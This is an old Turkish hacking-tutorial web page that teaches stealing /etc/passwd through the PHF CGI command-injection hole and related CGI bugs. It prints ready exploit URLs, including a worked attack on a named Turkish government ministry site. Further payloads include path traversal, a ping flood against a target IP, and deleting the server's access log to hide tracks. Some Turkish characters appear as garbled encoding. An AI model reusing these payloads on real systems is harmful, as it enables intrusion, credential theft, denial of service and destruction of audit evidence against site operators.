^^eXe^^---->>>HACKER SITESI

NUR ONL�NEE

ANA SAYFA

HABER

HACK

BORSA

JAVA SCRIPT KODLARI

Selam arkada�lar. Bu b�l�mle hacking i�in passwd dosyalar�n�n al�m�na ba�l�yoruz. En �nemli
k�s�mlardan biri olan bu
b�l�m uzun s�recek. �lk olarak PHF tekni�ini inceleyece�iz. Bu teknik �ok basit bir y�ntemdir.
Ama tabiki i�e yarar. Ama her
sitede de�il. Daha �ok web site hackingte kullan�l�r.

Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme web uzerinden baglanip
shellde bazi komutlari
calistirabilirsiniz... Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan passwd dosyasini alabilir ve
kirabilirsiniz...
Bu olay
web uzerinden olur ve hizli olur
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlar sistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :
/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar goruntulenir...
/cgi-bin/phf?Qalias=x%0als%20pass* yazarsaniz bulundugunuz dizinde
pass ile baslayan butun dosyalari listeler... Komutun Kullanimi Kolay! Simdi Biraz Ornek Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim yok
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin adresi : www.saglik.gov.tr
Browser inizi calistirin...Adres olarak www.saglik.gov.tr yazin. Evet sayfa geldi simdi bakalim phf acigi
var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor... Simdi passwd dosyasini alalim...
cat /etc/passwd komutu
ile... bu nu phf ile asagidaki gibi yaziliyor...
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz!
bunu simdi cut/copy/paste ile bir dosyaya saklayin...

CGI-BIN 'de g�venlik A��klar� (D�zenleyen Projman)

a- (Phf scripti): Pek �ok web ana bilgisayar� CGI-BIN g�venli�inden yoksundur. Bir de bunun �zerine sistem
y�neticilerinin CGI-BIN g�venlik a��klar�n� bilmemesi potansiyel sistem a��klar�na yol a�maktad�r. T�m d�nyada
pek �ok hacker'�n kulland��� cgi-bin g�venlik a����:

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd

Fakat baz� uyan�k sistem y�neticileri phf komutunun kullan�m�n� s�n�rlam��lard�r. Bu y�zden bu komutu
�al��t�ramayabilirsiniz. Fakat yine de alternatif web makinalar� �zerinde denemekte yarar var.

b- (Wrap Scripti): Irix i�letim sisteminin 6.2 versiyonunda rastlanan bu hatay� da ��yle istismar edebiliriz:

http://www.k�raca��m�zadres.com.tr/cgi-bin/wrap?../../../etc/passwd

http://www.k�raca��m�zadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edece�imiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (ba�ar�ya ula�abilme ihtimali kadar ula�amama ihtimali de var)

http://www.k�raca��m�zadres.com.tr/cgi-bin/view-source?../../../etc/passwd ya da

http://www.k�raca��m�zadres.com.tr/cgi-bin/view-source?%1b or %0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd

e- Di�er Denenebilir Scriptler:

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

http://www.k�raca��m�zadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

Dikkat: T�m Httpd giri�leri ana bilgisayarlarda g�nl�k �eklinde tutulmaktad�r. Bu
y�zden g�venli�i �ok y�ksek ve sizin ba��n�za bela a�aca��n�z� d���nd���n�z
sitelere bu y�ntemle eri�meyi kesinlikle d���nmeyin !!!

Hosted by www.Geocities.ws